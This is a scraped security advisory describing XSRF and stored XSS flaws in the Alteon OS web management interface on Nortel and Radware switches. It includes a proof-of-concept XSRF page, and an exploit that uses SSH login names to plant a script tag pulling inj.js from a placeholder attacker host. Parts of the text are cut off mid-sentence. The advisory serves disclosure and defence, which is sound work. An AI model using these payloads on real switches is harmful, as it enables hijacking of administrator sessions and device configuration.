12.41.44 [DSECRG-09-062] Alteon OS BBI (Nortell) - Multiple Vulnerabilities | |
Digital Security Research Group [DSecRG] Advisory http://dsecrg.com/pages/vul/show.php?id=161 Various XSS and XSRF vulnerabilities were identified in the Alteon OS Browser-Based Application: Alteon OS BBI Description Browser-Based Interface (BBI) software is included in the Nortel Networks(vesrions < 25.0.0.0) and Radware Details: 1) XSRF An attacker may exploit this issue to perform certain administrative actions, Example PoC (Change banner and apply): <html> <title>Nortel XSRF</title> <script src="http://<Switch>/switchSystem.html/bar?banner=newBanner</script> </body> 2) Stored XSS An attacker may inject 36 bytes of JavaScript code into log via SSH login Both vulnerabilities give chance to change switch configuration file or attack Administrator's Also any string parameters in BBI can be used for static XSS. Example Crete JavaScript code and put it on evil server (inj.js), this code will Proof of Concept: var request = !window.ActiveXObject ? new XMLHttpRequest() : new //Change banner request = !window.ActiveXObject ? new XMLHttpRequest() : new //apply changes request = !window.ActiveXObject ? new XMLHttpRequest() : new //Clear log Attacker can include this code into log without use of <EvilHost>. Next step - connect via SSH and inject parts of code. Exploit: alexey@shell#:ssh <NortelSwitch> login as: <script a=" alexey@shell#:ssh <NortelSwitch> login as: " src="http://<EvilHost>/inj.js" b=" alexey@shell#:ssh <NortelSwitch> login as: "></script> When administrator have a look into log via BBI, his browser get that: ... Solution: We have no answer from Radware about two month. So we don't know about Here are our recommendations: a) Turn off BBI. /c/sys/access/https/https d c) Allow access to SSH and BBI only for trusted machines and networks; References http://dsecrg.com/pages/vul/show.php?id=161 About Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website. Contact: research [at] dsecrg [dot] com | |
|
Total comments: 0 | |